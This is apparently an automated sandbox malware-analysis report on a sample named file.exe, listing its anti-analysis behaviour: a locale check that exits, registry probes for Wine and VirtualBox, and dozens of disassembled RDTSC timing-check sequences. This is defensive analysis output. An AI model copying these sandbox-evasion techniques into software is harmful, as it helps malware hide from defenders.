                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-36220
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE3E0 second address: 7CE3E6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE3E6 second address: 7CE3EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE3EB second address: 7CE3F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE3F1 second address: 7CDC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b jmp 00007F9FD080A014h 0x00000010 jmp 00007F9FD080A016h 0x00000015 popad 0x00000016 push dword ptr [ebp+122D0725h] 0x0000001c cld 0x0000001d call dword ptr [ebp+122D3AFFh] 0x00000023 pushad 0x00000024 xor dword ptr [ebp+122D3920h], edx 0x0000002a xor eax, eax 0x0000002c sub dword ptr [ebp+122D3080h], ecx 0x00000032 mov edx, dword ptr [esp+28h] 0x00000036 pushad 0x00000037 xor bh, 00000029h 0x0000003a mov edx, dword ptr [ebp+122D2CD5h] 0x00000040 popad 0x00000041 jmp 00007F9FD080A00Ah 0x00000046 mov dword ptr [ebp+122D2CF1h], eax 0x0000004c jng 00007F9FD080A012h 0x00000052 jmp 00007F9FD080A015h 0x00000057 mov esi, 0000003Ch 0x0000005c jns 00007F9FD080A00Ch 0x00000062 mov dword ptr [ebp+122D3AF4h], esi 0x00000068 add esi, dword ptr [esp+24h] 0x0000006c cld 0x0000006d lodsw 0x0000006f mov dword ptr [ebp+122D3080h], edi 0x00000075 add eax, dword ptr [esp+24h] 0x00000079 stc 0x0000007a mov ebx, dword ptr [esp+24h] 0x0000007e add dword ptr [ebp+122D3AF4h], edx 0x00000084 nop 0x00000085 push ebx 0x00000086 push eax 0x00000087 push edx 0x00000088 pushad 0x00000089 popad 0x0000008a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CDC5A second address: 7CDC5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93C900 second address: 93C904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CA8E second address: 93CADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007F9FD0C645F6h 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop ecx 0x00000013 pushad 0x00000014 ja 00007F9FD0C645E6h 0x0000001a jmp 00007F9FD0C645EEh 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007F9FD0C645EDh 0x00000026 popad 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93CADA second address: 93CADE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F195 second address: 93F1AC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F9FD0C645E6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 js 00007F9FD0C645E6h 0x00000016 pop esi 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F1AC second address: 93F1C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F9FD080A006h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push edx 0x00000016 pop edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F1C3 second address: 93F1E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0C645F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F1E5 second address: 93F1EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F1EA second address: 93F1F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F3C8 second address: 93F41D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD080A018h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c jmp 00007F9FD080A010h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jc 00007F9FD080A006h 0x0000001a popad 0x0000001b popad 0x0000001c mov eax, dword ptr [esp+04h] 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F9FD080A015h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F41D second address: 93F43C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9FD0EA45B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d jmp 00007F9FD0EA45BDh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F43C second address: 93F4F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0CB38C8h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F9FD0CB38C7h 0x00000014 pop eax 0x00000015 mov ecx, edx 0x00000017 push 00000003h 0x00000019 xor esi, dword ptr [ebp+122D2D15h] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F9FD0CB38B8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 00000014h 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b push 00000003h 0x0000003d jbe 00007F9FD0CB38BCh 0x00000043 mov esi, dword ptr [ebp+122D2E39h] 0x00000049 push 9546703Ch 0x0000004e jmp 00007F9FD0CB38BBh 0x00000053 add dword ptr [esp], 2AB98FC4h 0x0000005a call 00007F9FD0CB38BFh 0x0000005f or edi, 353042C3h 0x00000065 pop edi 0x00000066 lea ebx, dword ptr [ebp+1244505Dh] 0x0000006c mov di, bx 0x0000006f push eax 0x00000070 jc 00007F9FD0CB38C8h 0x00000076 push eax 0x00000077 push edx 0x00000078 jno 00007F9FD0CB38B6h 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F4F1 second address: 93F4F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F54C second address: 93F57B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F9FD0CB38C7h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnl 00007F9FD0CB38B8h 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jo 00007F9FD0CB38B6h 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F57B second address: 93F57F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F57F second address: 93F5E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F9FD0CB38B8h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000016h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 jmp 00007F9FD0CB38C1h 0x00000027 push 00000000h 0x00000029 jmp 00007F9FD0CB38BFh 0x0000002e call 00007F9FD0CB38B9h 0x00000033 jmp 00007F9FD0CB38BBh 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F5E1 second address: 93F5F3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F9FD0EA45B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F9FD0EA45BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F5F3 second address: 93F605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [esp+04h] 0x00000009 jnp 00007F9FD0CB38BEh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F605 second address: 93F61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9FD0EA45BBh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F61A second address: 93F69E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9FD0CB38B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F9FD0CB38B8h 0x00000010 popad 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 jmp 00007F9FD0CB38BCh 0x0000001b jmp 00007F9FD0CB38C8h 0x00000020 popad 0x00000021 pop eax 0x00000022 jmp 00007F9FD0CB38C2h 0x00000027 push 00000003h 0x00000029 call 00007F9FD0CB38C1h 0x0000002e or dword ptr [ebp+122D3920h], edi 0x00000034 pop esi 0x00000035 push 00000000h 0x00000037 mov dword ptr [ebp+122D3AF9h], edx 0x0000003d push 00000003h 0x0000003f and edx, dword ptr [ebp+122D2D6Dh] 0x00000045 push B71BF7A2h 0x0000004a push esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push esi 0x0000004e pop esi 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F69E second address: 93F6D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 08E4085Eh 0x0000000e jc 00007F9FD0EA45B9h 0x00000014 movsx ecx, bx 0x00000017 lea ebx, dword ptr [ebp+12445068h] 0x0000001d jns 00007F9FD0EA45B6h 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 jmp 00007F9FD0EA45C1h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 93F6D8 second address: 93F6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 951BF2 second address: 951BF8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DAEF second address: 95DAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DC98 second address: 95DC9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95DF5E second address: 95DFA2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9FD0CB38B8h 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F9FD0CB38BDh 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9FD0CB38BEh 0x0000001a jmp 00007F9FD0CB38C7h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E114 second address: 95E130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F9FD0EA45C2h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E287 second address: 95E2B0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F9FD0CB38C9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F9FD0CB38D8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E58C second address: 95E59C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jg 00007F9FD0EA45B6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E59C second address: 95E5A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95E5A0 second address: 95E5A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D904 second address: 92D909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D909 second address: 92D91C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9FD0EA45BEh 0x00000008 jng 00007F9FD0EA45B6h 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D91C second address: 92D935 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jnc 00007F9FD0CB38B6h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 ja 00007F9FD0CB38B6h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D935 second address: 92D93D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 92D93D second address: 92D941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95EBD6 second address: 95EBEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45BEh 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F1D2 second address: 95F1E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F817 second address: 95F821 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F9FD0EA45B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F821 second address: 95F83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F9FD0CB38BCh 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F83C second address: 95F840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 95F840 second address: 95F861 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0CB38BFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F9FD0CB38BCh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 961A65 second address: 961AA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45C4h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jnc 00007F9FD0EA45B6h 0x00000011 popad 0x00000012 popad 0x00000013 jng 00007F9FD0EA45DFh 0x00000019 push eax 0x0000001a push edx 0x0000001b ja 00007F9FD0EA45B6h 0x00000021 jmp 00007F9FD0EA45BFh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 965D14 second address: 965D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B474 second address: 96B487 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push esi 0x00000004 pop esi 0x00000005 jns 00007F9FD0EA45B6h 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96B487 second address: 96B4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007F9FD0CB38C9h 0x0000000f jmp 00007F9FD0CB38C1h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96BCE4 second address: 96BD11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0EA45C4h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F9FD0EA45BFh 0x0000000e jng 00007F9FD0EA45B6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DDB9 second address: 96DDBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DE58 second address: 96DE5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DE5C second address: 96DE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a jmp 00007F9FD0CB38BAh 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DE71 second address: 96DE8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9FD0EA45C5h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96DE8A second address: 96DEEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007F9FD0CB38C5h 0x00000014 mov eax, dword ptr [eax] 0x00000016 js 00007F9FD0CB38CFh 0x0000001c push esi 0x0000001d jmp 00007F9FD0CB38C7h 0x00000022 pop esi 0x00000023 mov dword ptr [esp+04h], eax 0x00000027 push eax 0x00000028 pushad 0x00000029 jo 00007F9FD0CB38B6h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E9E8 second address: 96E9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96E9ED second address: 96E9F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96EFBF second address: 96EFC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 96FD60 second address: 96FD66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 970F0B second address: 970F94 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F9FD0EA45BCh 0x0000000c jno 00007F9FD0EA45B6h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F9FD0EA45B8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2703h] 0x00000034 push 00000000h 0x00000036 mov edi, dword ptr [ebp+122D3938h] 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007F9FD0EA45B8h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 add edi, dword ptr [ebp+122D2DE1h] 0x0000005e mov esi, dword ptr [ebp+122D3A8Ah] 0x00000064 xchg eax, ebx 0x00000065 jmp 00007F9FD0EA45C6h 0x0000006a push eax 0x0000006b pushad 0x0000006c push eax 0x0000006d push edx 0x0000006e jnp 00007F9FD0EA45B6h 0x00000074 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9706A8 second address: 9706C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9FD0CB38C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9706C3 second address: 9706CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9706CA second address: 9706EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F9FD0CB38C5h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 97241E second address: 972498 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9FD0EA45BBh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push ebx 0x0000000d jp 00007F9FD0EA45C6h 0x00000013 pop ebx 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F9FD0EA45B8h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov dword ptr [ebp+122D2AA1h], eax 0x00000035 push 00000000h 0x00000037 cld 0x00000038 push 00000000h 0x0000003a mov edi, dword ptr [ebp+122D2E11h] 0x00000040 xchg eax, ebx 0x00000041 jmp 00007F9FD0EA45C5h 0x00000046 push eax 0x00000047 pushad 0x00000048 pushad 0x00000049 je 00007F9FD0EA45B6h 0x0000004f push eax 0x00000050 push edx 0x00000051 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 972F57 second address: 972FE7 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9FD0CB38B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c jo 00007F9FD0CB38BCh 0x00000012 jg 00007F9FD0CB38B6h 0x00000018 pop ebx 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F9FD0CB38B8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Bh 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 pushad 0x00000035 mov ebx, edi 0x00000037 xor dword ptr [ebp+1244B0D9h], ebx 0x0000003d popad 0x0000003e push 00000000h 0x00000040 mov dword ptr [ebp+122D2E75h], edi 0x00000046 push 00000000h 0x00000048 push 00000000h 0x0000004a push esi 0x0000004b call 00007F9FD0CB38B8h 0x00000050 pop esi 0x00000051 mov dword ptr [esp+04h], esi 0x00000055 add dword ptr [esp+04h], 00000017h 0x0000005d inc esi 0x0000005e push esi 0x0000005f ret 0x00000060 pop esi 0x00000061 ret 0x00000062 mov edi, dword ptr [ebp+122D2BFDh] 0x00000068 push eax 0x00000069 push eax 0x0000006a push edx 0x0000006b jmp 00007F9FD0CB38C5h 0x00000070 rdtsc
